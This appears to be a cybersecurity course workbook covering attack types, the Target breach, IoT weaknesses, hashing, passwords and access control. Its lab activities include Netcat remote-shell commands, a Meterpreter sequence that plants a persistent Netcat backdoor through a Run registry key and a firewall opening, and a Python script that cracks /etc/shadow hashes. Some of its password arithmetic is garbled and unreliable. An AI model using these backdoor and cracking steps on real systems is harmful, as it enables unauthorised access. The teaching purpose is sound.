A cookie is a data file that a website sends to your machine. It contains information that the website
can use to recognise a user when they visit again, and thereby tailor web page content specifically to
that user. What is stored in a cookie depends on the web site being visited and may contain login
credentials and credit card details. Credentials are probably hashed, so your password cannot be
revealed, but a hacker can use your cookie to login. An attacker can access a user’s cookies via WiFi
or cross-site scripting methods.
https://www.acunetix.com/websitesecurity/cross-site-scripting/
Bait and switch

In the bait and switch technique a user clicks on a download link for some wanted software, but the
link downloads malicious software. The link is commonly at a software download site such as
sourceforge.net, or is embedded in advertising links at high-profile sites such as yahoo.com, that sell
advertising space to third parties
Eavesdropping
Eavesdropping commonly occurs on wireless networks, as opposed to wired networks, where
transmissions can be easily intercepted. A rogue access point can be setup at free WiFi centres and
acts as a man-in-the-middle where transmission are intercepted and stored, and then passed on to
the internet. The stored information can then be read by an attacker.
Phishing
In one form of phishing an attacker sets up a replica site for say mybank.com. The replica sites
domain name might be very similar to the actual domain name, for example mybank1.com. A
hyperlink to the site along with some relevant content is then emailed to a target. If the target is not
wary, they may click on the link, not recognise the difference in domain names, and use their login
credentials to login to the fake site. The attacker then has the targets login credentials for the actual
site.
Clickjacking
Clickjacking is a method of tricking a user into clicking on a webpage malicious element. The element
is transparent and placed over the top of a non-malicious element such as a login button or any
other legitimate element. So, the user believes they are clicking on a wanted element but they click
on the hidden link which may redirect them to a malicious site.
Fuzzing
Fuzzing is a technique used to find software vulnerabilities. Automated tools are used to provide
random and/or invalid data to an input such as a form field, and then the output is monitored for
program failings such as buffer overflow and system crashes. Examples of fuzzing input include
different combinations of alphanumeric characters and symbols, particularly those known to cause
issues such as very large numbers, zero, binary strings and characters specific to a vulnerability such
as ‘ = for SQL injection. Examples of items that can be fuzzed include form fields, wireless access
points and Essentially, fuzzing finds bugs by injecting malformed data into a program or service.
512277200.docx
Advanced Persistent Threat (APT)
APTs are stealthy attacks that gain unauthorised entry to a system and then remain undetected,
moving about installing malware and opening back doors.
Back door
A backdoor is a means into a computer system. A backdoor may be created by a software developer
as an administrative method to troubleshoot issues remotely. However, that backdoor maybe used
for malicious purposes if a hacker can locate it. Alternatively, a hacker may exploit a system such
that the system can be opened whenever they like, for say loading malicious software.
Using Netcat and Meterpreter to open a backdoor

Netcat is a tool that allows communication and network traffic to flow from one machine to another.
Netcat can transfer files, conduct port scans and act as a simple chat program. Netcat can connect
from any port on your local machine to any port on the target machine. Netcat has a client and
server mode. Whilst in server mode netcat waits and listens for incoming connections.
Activity – Use NetCat in chat mode.
nc -l -p 2323
In the command above, “nc” is used to invoke the Netcat program, whereas the “-l” is
used to put Netcat into a listener mode. The “-p” is used to specify the port number we
want Netcat to listen on. At this point Netcat is running and waiting to accept an
incoming connection on port 2323.
nc 172.16.45.132 2323
Running this command from the second PC will force Netcat to attempt a connection to
port 2323 on the machine with an IP address of 172.16.45.132. The two PCs should now
be able to communicate. You can test this by typing text into either terminal window.
To end the “chat” and close the session, we can issue the CNTL C key combination.
This will however close the Netcat server also. In order to leave a backdoor open the
Netcat server can be ran in persistent mode such that it will always listen for a
connection request.
Use –L for a persistent connection.
However, the ‘-L’ option will not survive a reboot. You would need to modify the
Windows registry to make Netcat truly persistent.
512277200.docx
Activity – Use NetCat to transfer files.
Chat is nice but transferring files or setting up a remote shell is to more likely be a
hacker’s intention. To transfer files:
 nc –l –p 2323 > [filename.exe]

 Any input received will be stored in filename.exe.
 nc 172.16.45.129 2323 [filename.exe]
Note that Netcat does not provide feedback regarding success or failure.
Activity – Use NetCat to open a remote shell.
Netcat can be used to provide a remote shell such as the MS Windows command
interpreter, cmd.exe.
 nc –L –p 2323 c:\windows\System32\cmd.exe
 The attacking machine can now connect and use the remote shell.
 nc <target_ip_address> 2323
Using Meterpreter to setup a permanent backdoor using NetCat

Setting up a remote shell, as shown previously can be done remotely using Metasploit’s Meterpreter
program. Meterpreter can also be used to modify the registry of the remote machine so that the
remote shell (backdoor) opens whenever the machine is booted
The process is as follows:
 Use Meterpreter to upload NetCat (nc.exe) to the C:\windows\system folder

 Use Meterpreter to set the registry values so that NetCat will start whenever the system
starts
 Use Meterpreter to start the command shell on the remote machine
 Use the command shell to run ‘netsh’ to open a firewall port, say 445
 Use NetCat on the local machine to open the remote command shell
 Use which ever commands are provided by the remote shell
512277200.docx
Activity – Use Meterpreter and NetCat to set up a permanent remote shell
https://www.offensive-security.com/metasploit-unleashed/persistent-netcat-backdoor/
1. meterpreter > upload /usr/share/windows-binaries/nc.exe

C:\\windows\\system32
2. meterpreter > reg enumkey -k
HKLM\\software\\microsoft\\windows\\currentversion\\run
3. meterpreter > reg setval -k
HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
4. meterpreter > reg queryval -k
HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
5. execute -f cmd -i
6. netsh firewall show opmode
7. netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
8. netsh firewall show portopening
9. nc -v 172.16.104.128 445
3.4 Characteristics and operation of a cyber-attack are explained
Characteristics of a cyber-attack
A cyber-attack can be categorised in various ways as follows.
Actors
 Hacktivists
 Nation state
 Internal to an organisation
 External to an organisation
 Individual
 Groups
 Cyber criminal
Motivation
 Financial
 Revenge
 notoriety
 fun
 control
 terrorism
 espionage
512277200.docx
Target
 Individuals in the general public, businesses, governments organisations, countries
Most common targets are:
o Small business – because they are not secure
o healthcare – because of the mass of confidential information
o Law firms – because of the nature of the information available. e.g. can be used to
create fake IDs from personal information and manipulate the stock market
https://www.darkreading.com/attacks-breaches/hackers-face-$89-million-fine-for-
law-firm-breaches/d/d-id/1328840 (accessed 29 May 2020)
o PCs and phones – used for cryptojacking
o Financial institutions – because of the money
 End-point devices such as PCs, servers, and printers
 intermediary devices such as routers and switches
Activity – Visit Tech Jury and review cyber-crime statistics.
https://techjury.net/stats-about/cybercrime
Attack surface
A target’s attack surface is the number of vulnerable points it has; points where the system can be
compromised. Vulnerabilities include unpatched software, software development bugs, social
engineering access points, installed but unused services, open ports that are not used and insecure
use of administrative privileges. The more vulnerabilities a target has, the larger its attack surface. A
target in this regard can be an individual device, a network, or an organisation.
Effect on target
Depending on how a target is defined, effects on the target include system shutdown, poor
performance, exposure of confidential information, business closure, loss of reputation and financial
loss.
Duration
The duration of a cyber-attack is variable depending on the type of attack, intended consequences
and a victim’s ability to respond. This could be from fractions of a second through to days, weeks,
and months.
 DDoS attacks for example may last up to 24 hours, or as long as it takes to get a solution in
place.
 The encrypting period of a ransomware attack depends on the number of files encrypted
and the processing power of the computer. A few hours perhaps. The ongoing exchange of
funds and potential unencrypting of data may take 24 – 48 hours.
 Malware installations vary depending on the size of the malware and subsequent action. For
example, installing the malware may take seconds to minutes and the subsequent extraction
512277200.docx
of data from the target may take hours to days depending on process used (intermittent or
permanent).
 A virus or worm may only take seconds or less to do their work.
 SQL injection attacks take as long as needed to find a vulnerable site and to then test
injected code until a vulnerability is found. This could be hours to weeks.
 An Advanced Persistent Threat may exist for days, weeks or months before it is discovered.
Or it may never be discovered at all.
Attack vector
The attack vector is the method an attacker uses against a vulnerability in order to deliver the
payload, or the method by which a malicious event occurs, or the path through which an attack
occurs, or the vehicle through which the exploit occurs. Examples of attack vectors include social
engineering, email, websites, and exploit applications such as Metasploit. The most common attack
vectors are email and social engineering.
Vulnerability
A vulnerability is a weakness in a system. It is the point that is attacked. Vulnerabilities include
unpatched software, software development bugs, social engineering access points, installed but
unused services, open ports that are not used and insecure use of administrative privileges.
Malicious software
Malicious software is software that purposefully creates an unwanted effect upon a target. Examples
of malicious software include:
 virus’s, worms, and Trojans

 ransomware- encrypts data and demands financial payment for decrypting that data
 spyware – logs activity and/or relays information to a remote device
 adware – unwanted advertisements
 rootkits
The term ‘Rootkit’ is a derivative of root level access and a kit of tools. Rootkits are programs that
can hide files, programs, processes, and entry/exit points from users and from the operating system.
Depending on the variety of rootkit used, they can also record keystrokes, setup backdoor programs,
falsely report free disk space, hide registry keys and carry out other mischievous tasks. Rootkits also
hide themselves.
When executed Rootkits reach deep within a system and can intercept operating system and other
software requests. For example, when a user presses CTRL-ALT-DEL to bring up task manager, a
rootkit can intercept the request and remove its processes from task manager, and thus appear
invisible. Alternatively, a rootkit could just totally prevent task manager from being viewable.
Rootkits can be classified by how deeply they infect a system, whether that be at the application,
firmware, kernel or virtualised level. Rootkits may not be detected by anti-virus software and so
specialised discovery and removal tools are available.
512277200.docx
Some examples of root kits include:
TDSS
TDSS is a very wide spread rootkit that also goes by the name of Rootkit.Win32.TDSS,
Tidserv, TDSServ, and Alureon. TDSS monitors a system's network traffic, searching it for
usernames, passwords and credit card data.
ZeroAccess
ZeroAccess, also known as max++ and Sirefef is a trojan horse used to download other
malware on an infected machine and to form a botnet mostly involved in Bitcoin mining and
click fraud, while remaining hidden on a system using rootkit techniques.
Activity – Visit Bleeping Computer and review rootkit varieties.
https://www.bleepingcomputer.com/startups/rootkits
Then visit Heimdal Security and review types of rootkits and rootkit detection/removal
tools.
https://heimdalesecurity.com/en/
Operation of a cyber attack

The operation of a cyber-attack can vary from simple social engineering to gain credentials and then
subsequent system access via those credentials, through to multi-step processes such as that used in
the Target data theft attack where 40 million credit and debit card numbers were stolen from the
retailer.
Target attack
1. Installed malware through email phishing to steal the credentials of a third-party service
provider to Target, a HVAC vendor.
2. Stolen credentials were used to gain access to a web application hosted on Targets internal
network
3. A PHP script file was uploaded to the web application opening up a web shell backdoor
allowing uploading of files and executing operating system commands.
4. Using operating system commands, the names of members of the domain was obtained.
This includes users, computers and services. The purpose of the located computers was
determined from their names (e.g. MSSQLvc/billingServer) The DNS server was then queried
to obtain the IP addresses of those names (used later).
5. Administrative privileges were gained by a technique known as “pass-the-Hash” which
allows impersonation of an administrator by using their hash directly without knowing their
password.
512277200.docx
6. A new domain account was created using the administrative privileges, so that the attackers
could hide in plain sight
7. ‘Angry IP scanner’ was used to detect computers that were accessible on the network from
the current computer, and then a port forwarding IT tool was used to tunnel through a
series of servers to bypass security measures. Remote execution on the targeted servers
occurred by using Microsoft PSExec (like Telnet) and a Remote Desktop Client. Microsoft
Orchestrator was then used to maintain access for remote execution of code.
8. SQL query tools were used to retrieve database contents. However, Payment Card Industry
standards saw that there was no retrievable data, and so the attackers moved the target to
the Point of Sales system.
9. Using the info gained at step four and then remote execution ability from step seven,
malware Kaptoxa was installed on the Point of Sales machines and retrieved credit card
numbers stored in memory.
10. The credit card numbers were copied to an internal FTP machine using the administrator
credentials
11. A script was used to transfer the credit card numbers from the internal FTP machine to the
attackers external FTP machine.
https://www.cio.com/article/2600345/11-steps-attackers-took-to-crack-target.html
(accessed 29 May 2020)
3.5 Trends of cyber threats are investigated
Cyber threat trends

Trends in cyber-crime follow what is easy to do, what is commonly available and what reaps the
most reward. And so, the cyber threat landscape changes as technology and its uptake, changes.
Activity – Visit Scam Watch and review trends in cyber-crime.
https://www.scamwatch.gov.au/about-scamwatch/scam-statistics
Phishing
Phishing is one of the most common and successful exploits and with the sale of phishing kits on the
Dark Web it is set to increase. A phishing kit is a set of tools that enables someone to start and
manage an ongoing phishing campaign. The kits are simple, and so even those with little knowledge
can use them. A phishing kit includes web development software complete with graphics and fonts
to mimic a legitimate site such as Microsoft or Yahoo. The kit also includes an email spam system to
automate mailing and sometimes a list of legitimate email addresses. Though email lists maybe sold
separately as spam-kits.
512277200.docx
Remote access and IoT
Remote attacks are becoming more common because of the increase in Internet of Things (IoT)
devices. Traditionally remote attacks centred on routers, servers, workstations, and Network
Attached Storage devices. Device like these are often well secured and so attacks are often not
successful. However, with the advent of IoT there is a whole new range of end point devices such as
camera’s, thermostats, and door locks. In addition to their population increase, IoT devices are often
not well secured having default login credentials and vulnerable protocols.
Smartphones
Smartphones are the most common device attacked. This is likely because a smartphone is more
accessible than other devices and because a smartphone includes email access. Attacks to
smartphones come via connecting to untrusted Wi-Fi networks, unpatched operating systems
particularly for Android, and social engineering attacks. Two-factor authentication is also a factor in
smartphone usage for cyber-crime as having access to a targets phone makes login credentials easier
to find. Bring Your Own Devices (BYOD) is also a factor as confidential workplace data may be stored
in an unencrypted stated on a private phone. As smartphone usage continues to increase, as BYOD
becomes more popular, and as two-factor authentication becomes more common, we can expect
that smartphone related cyber-crime will also increase.
Artificial intelligence
Imagine a program that once set in motion, automatically scans website after website, creating
fraudulent mirror sites and scraping email addresses and then forging email phising attacks and
acting on the response, with no human intervention. This is an example of Artificial Intelligence (AI).
One of the factors making cyber-crime appealing is its anonymity. It appears to be human nature
that if a person thinks they are unlikely to be caught, they are more likely to commit an offence. AI is
making individuals even more anonymous than previously allowing fully automated attacks. So, as AI
technology improves and individuals distance themselves from the majority of the crime, we can
expect cybercrime in general to increase.
3.6 Cyber-attacks on enterprise infrastructure are identified
Cyber-attacks on enterprise infrastructure

With the population explosion of Internet of Things, as well as Industrial Internet of Things devices,
and Industry 4.0, the attack surface of an enterprises infrastructure increases. Traditional
cyberattacks centre on workstations, servers, routers, switches and printers, but IoT gives access to a
different set of attackable devices such as lighting, electrical systems, traffic control systems, Heating
Ventilation and Air Conditioning (HVAC), SCADA systems & Programmable Logic Controllers (PLC).
These attackable devices can be described as ‘Operational Technology’; they are hardware &
software that monitors and controls how physical devices operate. A significant difference seen
when comparing operational technology with traditional IT devices, is the threat to life found with
malicious control of operational technology.
512277200.docx
Examples of enterprise infrastructure attacks
Stuxnet is a 2010 malicious worm that targets Supervisory Control and Data Acquisition (SCADA)
systems. SCADA systems monitor and control devices such as valves, pumps, and motors in industrial
processes. Stuxnet reportedly compromised PLCs at an Iranian nuclear site, causing fast-spinning
centrifuges to tear themselves apart.
Activity – Visit CSO Online and review the Stuxnet attack.
https://www.csoonline.com/article/3218104/what-is-stuxnet-who-created-it-and-how-
does-it-work.html
IN 2015 and 2017 Malware titled ‘Black Energy 3’, took remote control of SCADA systems resulting in
electricity generation plants being shut down. This resulted in hundreds of thousands of people
going without electricity and subsequently, heating.
Activity – Visit BBC and review the 2015 Ukranian power station attack.
https://www.bbc.com/news/technology-35667989
3.7 Examples of IOT devices are described and demonstrated
Internet of Things devices

An Internet of Things device is a sensor or actuator that carries out its operation through the
Internet. As they are a new advent, IoT devices are not devices that you would generally consider as
being connected to the Internet such as a workstation, printer or perhaps even a smartphone. IoT
devices are seen in most if not all employment and other sectors including consumer, industrial,
education, manufacturing, transportation, healthcare, energy, and law enforcement.
IoT device examples

Examples of IoT devices include a light that can be turned on via a phone app; a camera that
provides video to a remote destination over the Internet; a remote gate opener controlled by a
smart phone; a remote controlled thermostat provided that control occurs over the Internet; motor
control in a factory, and the sensors and/or actuators in a car, plane, or anywhere else, if those
sensors and/or actuators feedback through or are controlled over the Internet. IoT devices are often
referred to as smart devices and so smart refrigerators, smart watches, smart door locks, smart cars
and smart security systems can all be referred to as IoT devices.
512277200.docx
Activity – Visit Software Testing Help and review current IoT devices.
https://www.softwaretestinghelp.com/iot-devices/
Activity – Use Packet tracer IoT to demonstrate IoT devices

Packet tracer includes premade examples of functional IoT networks (file > open)
3.8 Security vulnerabilities for IOT devices are defined
IoT security vulnerabilities

IoT devices are often not designed with security in mind and so there are many vulnerabilities. In
2018 OWASP released a top 10 IoT vulnerabilities as follows.
1. Weak, guessable, default or hardcoded passwords

Weak and guessable passwords are easily brute forced. Default passwords are publicly
available and are often not changed. Hardcoded passwords are also publicly available and
cannot be changed
2. Insecure network services
Services such as DHCP are implemented on some IoT devices. These can be leveraged
3. Insecure ecosystem interfaces
An ecosystem interface refers to the interface between the IoT device and other entities
such as a network or direct attachment to another device. Issues here include no encryption
and no authentication. That is to say that credentials may be sent in clear text and access
can be granted without credentials
4. Lack of secure update mechanism
The device cannot be securely updated. For example perhaps the device can be updated
without authentication, or the update in transit is not encrypted, or it is not possible to
determine the current version of firmware on the device.
5. Use of insecure or outdated components
This includes software and/or libraries and/or hardware that are known to be insecure,
including customization of an operating system on which the device sits
6. Insufficient privacy protection
Uses personal information that is stored insecurely on the device or that passes in transit
through an insecure ecosystem as described in 3
7. Insecure data transfer and storage
No encryption and/or access control anywhere within the ecosystem including on the device
8. Lack of device management
Device are not implemented, updated or decommissioned without security in mind.
512277200.docx
9. Insecure default settings
Default settings from manufacturer are either not changed or cannot be changed. These
default settings are available for lookup on the Internet
10. Lack of physical hardening
Devices are physically accessible to attackers
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project (accessed 29 May
2020)
4.1 Techniques to protect personal devices and data are described and implemented
4.3 Methods to protect personal devices from threats are implemented
Protecting personal devices and data

The general method used to protect personal devices from threats is to implement multiple
techniques as follows.
Encryption
Encryption is the encoding of data so as to make it unreadable. Commonly used encryption
algorithms include AES, RSA, 3DES and Twofish.
AES (Advanced Encryption Standard)

AES is a symmetric encryption algorithm, meaning that the same key is used for encryption
and decryption. Various AES bit lengths are possible including AES-128, AES-192 and AES-
256. More bits equates to a longer and more difficult to crack key. An issue with symmetric
algorithms is that their needs to be a secure method of sharing the key.
RSA (Rivest, Shamir & Adelman)

RSA is an asymmetric encryption algorithm, meaning that different keys are used for
encryption and decryption. RSA keys are 1024 or 2048 bits. Due to technology advancement
it is estimated that by the year 2030, RSA key lengths of 3072 bits will be required for
security.
However, the longer the key length the longer it takes to carry out encryption and
decryption. So, although unlike symmetric algorithm, the key is secure, using RSA encryption
on an ongoing basis such as when communicating between a web browser and web server,
cause too much of a performance detriment to be usable. Therefore, for these types of
transactions the initial communication involves encryption of a symmetric key using RSA.
Once the key transfer has occurred, the remaining communications is carried out using
symmetric encryption.
Hashing
On Windows systems passwords are not stored on the machine. Rather a hash of the password is
stored. Then when a user enters their password, the password is hashed and compared to the
Activity – Visit the following link and notice that even a slight change in password will
produce a totally different hash
https://emn178.github.io/online-tools/sha256.html
512277200.docx
stored hash of the password. If the hashes match then the correct password must have been
entered. Notice that a given hashing algorithm, such as MD5, will always produce the same hash
from a given password.
Password cracking software uses the same principle that a given word will always produce the same
hash. The software generates a password and then generates a hash of the password. It compares
the hash to the hash on the local machine. If the hashes match, then the password has been
guessed. This method is called brute force. Unless you have some idea of what the password is, then
brute force is the only guaranteed method of cracking the password. Unless the password is short or
simple, brute force would take many years to crack a password.
Trusted Platform Module (TPS)

A TPM chip is included on the motherboard of most modern PCs. The chip can be configured via
software to generate RSA encryption keys and part of one of the keys is stored in the chip. This
means that the key is not stored entirely on the disk drive which means that the drive cannot be
removed, and access attempts made on it. Key creation happens behind the scenes and so when
encrypting a drive with MS BitLocker for example, Windows will generate the keys, store part of one
in the chip and use your password in conjunction with the key to access your data. You need your
password and the same computer that the encrypted drive was created in, to access the data.
Passwords
Difficult to guess and crack passwords are vital for system security. A password of at least 8
characters using a mix of capital, lower case, numbers, and special characters is recommended. The
possibility of a password being cracked is directly related to the length and mix of characters from
the available character set. Assuming a three-character set (1, 2, 3) and a password length of two
characters, then there are nine possible combinations. 1, 2; 1, 3; 2, 1; 2, 3; 3, 1; 3, 2; 1, 1; 2,2;
3,3;
The formula for the number of possible combinations given a known character set and password
length is, character set to the power of the password length. In this example: 3 2 = 9 possible
combinations. In fact, there would be more combinations than this because the length can be one,
two or three characters. So total = 31 + 3 2 + 33 = 3 + 9 + 27 =39 combinations
On a common keyboard the character set is 95. (a-z; A-Z; 0 – 9; special characters). So, assuming an
eight-character password length, the number of possible combinations is:
958 + 957 + 956 + 955 + 954 + 953 + 952 + 951 = 6.704780955 x 1015 (6,704,780,955,000,000)
Or 6.7 sextillion combinations.
To brute force check that many combinations via a regular login page is not possible. Assuming a
hash of the password was available to work on, an average PC might be able to check 100 million
passwords per second. Which for 6.7 sextillion combinations, works out to be about 775 days. Add
an extra character on to the eight-character password, and this jumps to 630 sextillion combinations
which equates to about 72945 days to crack, assuming the hash was available.
512277200.docx
Note that there are faster methods of brute forcing such as using the graphics processor in a PC.
Using more advanced methods it is possible to check about 350 billion hashes of passwords a
second. This could brute force a 958 password in about 5 hours.
Pass phrase
Pass phrases such as “if0nlyThereweret!me” are more secure than passwords due to their length.
Also, because they are easier for a user to remember than a complex password such as #5FGE@7!,
the pass phrase does not need to be written down
Salt
A salt is random clear text data that is added to a password before it is hashed, to create a more
secure hash. When a user first creates an electronic account, a random string known as the salt is
added to the password. The password and salt combination are then hashed and stored. The clear
text salt is also stored with the hash. When a user logs in again, the entered password is paired with
the salt, then hashed, and then compared against the stored hash. If the hashes match, then the
correct password must have been used, and entry is granted.
Note that salting does not protect against guessing a user’s password or protect brute force
password attacks because the clear text salt that matches the username, is always provided. Salting
protects against premade lookup table attacks where a database of hashes can be looked up to see
what their matching password is. For example, a hash can be entered in various online sites that
contain lookup tables like the one below
Password MD5 hash
12345678 25d55ad283aa400af464c76d713c07ad
letmein 0d107d09f5bbe40cade3de5c71e9e9b7
Pasting in the hash will retrieve the associated password.
512277200.docx
Activity – Try it and see:
 Enter a simple password at the following site and generate a hash

http://www.miraclesalad.com/webtools/md5.php
 Now copy that hash into the relative field at the link below and note the
password is likely discovered
https://crackstation.net/
The site contains a lookup table with billions of entries and so simple passwords are
easily broken.
Now back to salting. If a salt, such as!46&8f is added to a simple password such as ‘letmein’, the
password becomes !46&8fetmein. The hash of this password is very unlikely to exist in a lookup
table.
Python Script for Password Cracking

crackme.py - is a password cracker for Linux shadow files. More specifically it is a hash comparator
for crypt(3) hashes which are a Data Encryption Standard hash used within the shadow file of Linux
distributions. The script can be executed via the python interpreter as follows -
 python3 crackme.py <password list> <shadow file>

e.g python3 crackme.py list.txt /etc/shadow
 The password list and shadow file should exist in the same directory as crack3.py or the full
path to the files must be provided. e.g python3 crackme.py /usr/share/wordlists/list.txt
/etc/shadow
 There is no screen output while the script is running. After checking all passwords against all
hashes, the script ends and displays any found passwords along with the relevant username.
If no hash matches are found, the script ends without displaying anything.
 The password cracker script is to be ran on a shadow file (/etc/shadow) using a supplied list
of passwords
2. Create your own password list that contains at least one password for a user on your Linux
system, and run the script as follows.
3. python3 crackme.py passwords.txt /etc/shadow
4. The hash should be matched, and the password found
512277200.docx
Activity – Crack a password by comparing hashes from a Linux shadow file with those
generated from a word list.
The following is an entry found in a Linux shadow file (/etc/shadow)
user2:$6$T05Pet/R$Ku0yz7Zs.KZArztetOhb5hPAs0Hk4XHF6hbiskh9.PyZ9w2bHLGJOLDvkcXe6Y3
LlgjUwvAD0zojZOY/t2crI
There are four sections to the entry.
1. Username – user 2
2. Hash type – 6 (sha256 crypt(3))
3. Salt - T05Pet/R
4. Hashed password -
Ku0yz7Zs.KZArztetOhb5hPAs0Hk4XHF6hbiskh9.PyZ9w2bHLGJOLDvkcXe6Y
3LlgjUwvAD0zojZOY/t2crI
Use the following script to crack a password in the shadow file
Copy the following script into a text file in Linux and save it as crackme.py. Note that Python 3
must be installed (apt install python3).
[Continued…]
512277200.docx
#imported modules for methods used by script
import crypt
import sys
#If sufficient command-line arguments have not been used then print error message and exit program.
#Otherwise proceed to open the files given as command-line arguments
if len(sys.argv) < 3:
print("program requires two command-line arguments. 1. Password list 2. Shadow file")
sys.exit(1)
#open the file given as command-line argument-one as read-only, and assign a handle called 'passwordFile'
passwordFile = open(sys.argv[1], "r")
#for every line in the open file repeat the following
for password in passwordFile:
#open the file given as command-line argument-two as read-only, and assign a handle called 'shadowFile'
shadowFile = open(sys.argv[2],"r")
#for every line in the open file repeat the following
for line in shadowFile:
#split the line into sections delimited by ':', retrieve the second entry (hash, salt and $6$ descriptor) on that line
#and assign its value to 'retrievedHash'
retrievedHash = (line.split(":")[1])
#split the line into sections delimited by ':', retrieve the first entry (username)on that line
#and assign its value to 'retrievedName'
retrievedName = (line.split(":")[0])
#strip the newline descriptor from the password and pass it through to crypt() along with the
#full encrypted password including the salt and the $digit$ method. crypt() will return the hash of the password
hash = (crypt.crypt(password.rstrip(),retrievedHash))
#if the returned hash is the same as the hash retrieved from the shadow file,
#then the password passed through to crypt() must have been the users password
#and so print the users password with the newline descriptor removed
if hash == retrievedHash:
print("Found password for "+ retrievedName + " as "+ password.rstrip())
#close open files
shadowFile.close()
passwordFile.close()
512277200.docx
Multi-factor authentication
Multi-factor authentication uses a combination of factors before access is granted to a device. For
example, a two-factor authentication method may use a password and a swipe card. The possible
factors include
 Something you know - password

 Something you have – swipe card (pin code SMS to phone)
 Something you are – biometric scanning such as fingerprint or gait
Two-factor authentication (2FA) is common today.
Backup
The backup of data can help restore data after a loss or a ransomware attack. Personal backup media
usually includes an external drive or the cloud. Backups should occur daily and test restoration
should occur after each backup. This will ensure data can be accessed again should data be lost,
deleted, or maliciously encrypted.
Anti-malware and Anti-virus

Anti-malware and anti-virus tools are different. There functionality crosses over between the two
which confuses the issue. Anti-virus is designed to target viruses, worms, and Trojans, generally in
real-time but can also find them after they have infected a device. Anti-malware on the other hand is
designed to locate infections rather than provide protection in real-time and targets adware,
spyware, and malware. Often anti-malware is a tool designed to find and remove a single type of
threat such as a rootkit that a general anti-virus product cannot remove. Ant-virus is designed to
prevent a multitude of infections. However, some anti-malware is also able to find a multitude of
infections.
 Anti-virus products include AVG, Windows defender and Symantec

 Anti-malware includes Malwarebytes, TDDSKiller, Spybot Search and Destroy and Symantec
threat specific tools.
It is not uncommon for someone who deals with malware and viruses to use multiple general
antimalware tools on a regular basis, as well as download specific removal tools as required.
512277200.docx
Activity
 Visit Kapersky and review the TDDSKiller root kit removal tool
https://usa.kaspersky.com/downloads/tdsskiller
 Review threat-specific removal tools
https://www.majorgeeks.com/mg/sortname/symantec_removal_tools.html
Operating system and application updates

Lack of operating system and application updates is one of the largest causes of successful cyber-
attacks. They are both listed by the Australian Signals Directorate as essential items for mitigation of
cyber-attacks. Assuming a vulnerability is known to a vendor there is usually a patch available for it.
Depending on the application or operating system in use, updates may be automatic or manual
512277200.docx
Configure browser to block Flash, ads and java
For many years pages a web browser used solely html script and showed only still images and text.
Adobe Shockwave Flash player changed this and enabled playing of movies, games, and
advertisements within a web browser. It became very popular and was installed on many millions of
devices. However, its widespread use meant that it became a target for hackers, and they found
many vulnerabilities. Currently there are over 1000 vulnerabilities listed for Flash. Because of this it
is recommended to keep flash updated and/or block Flash in a web browser either permanently or
on a ‘as needed’ basis.
Activity
Visit CVE and review Flash vulnerabilities.
https://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-6761/Adobe-
Flash-Player.html
512277200.docx
Java is like Flash in its application and vulnerabilities. Most browsers today no longer support Java.
Activity
 Visit Make Use Of and review the top ten list of no longer supported applications
https://www.makeuseof.com/tag/java-security-risk/
 Visit CVE and review Java vulnerabilities
https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-
19117/Oracle-JRE.html
It is also recommended to block web browser ads. Ads are not just annoying; they are also a source
of malware (malvertising). By clicking malvertising or even just visiting a site with malvertising you
can start the process of infection.
However, blocking ads may impact your viewing pleasure. Because ads are a source of revenue some
sites may refuse to provide their content if an ad blocker is used. In that instance you could enable a
browser’s Phishing and Malware protection features
Activity
Although not part of our unit, in your own time you may want to
 Encrypt a hard drive using Bitlocker (note that virtual box does not support this)
512277200.docx
 Set strong passwords and pass phrases
 Use a backup program such as Paragon community edition
4.2 Authentication techniques are identified and demonstrated
Authentication Techniques
Authentication on a computer or network is the method used to identify a user, object or service.
Often authentication occurs via a user supplying login credentials such as a username and password.
However, other authentication methods include biometric devices such as fingerprint, iris and facial
recognition scanners, digital certificates, and smart cards.
Objects such as printers and services that provide data and operations to network clients such as a
web service or file service, also require authentication. This is an automated process that happens in
the background using operating system preassigned authentication tokens
On a local machine the ‘Local Security Authority’ (LSA) is a system process that authenticates and
logs users on to a local computer. The LSA communicates with the ‘Security Accounts Manager
(SAM) database that stores local user accounts and groups
On a domain machine the LSA communicates with the Active Directory database that stores
accounts for a network domain.
AAA
Authentication is often spoken about in conjunction with Authorisation and Accounting (AAA). In a
computing environment authorisation is the process of allowing or denying access to system
resources. File and folder NTFS permissions such as read and write permissions is an example of
authorisation. Once a user, object or service is authenticated they are automatically authorised to
access resources based on set permissions.
In a computing environment, accounting refers to keeping track of the activities of a user, service or
object and their resource consumption. Examples include amount of data sent during a session,
success or failure of login attempts, and time of printing.
Active Directory Users and Computers

Active Directory users and computers is the user interface within Active Directory where user
accounts and hence authentication, can be managed. A user account contains a username,
password, and group membership. Active Directory Users and Computers is installed automatically
when the Active Directory Domain services role, is installed.
Activity – AAA
Add users and groups in Active Directory. Setup file and folder permissions for
individuals and groups. Monitor failed login attempts via auditing.
A note about domain user accounts and domain computers. Active directory contains domain user
accounts and domain computer accounts. A computer account is added automatically when a
512277200.docx
computer joins a domain. A user account is manually added and includes username, password, and
group membership. There can be multiple user accounts allocated to a single computer account.
4.5 Logical and physical access controls are defined and implemented
Logical and physical methods of gaining access to computing elements

Physical access control includes keys, ID cards, smart cards and biometric devices that enable access
to an area, room, or building.
Logical access controls apply to authentication, authorisation and accounting. It includes passwords
and biometric devices that provide access to networks and other resources. This includes
permissions to access files, folders, printers, and other devices.
Biometric devices
Biometric devices are an example of a logical and a physical access device. For example, a fingerprint
scanner can provide access to the logical elements of a PC or give access to open a door into a room.
Biometric devices include iris scanners as well as facial, gait, voice, and keystroke recognition.
Permissions
Permissions are applied to computing resources such as files, folders and printers to determine who
has access and what type of access they have. For example, user1 may have access to read, write
and modify a specific file, whilst user2 may have no access to that file, or perhaps read-only access.
Permissions can be assigned to individuals or to groups that contain individuals.
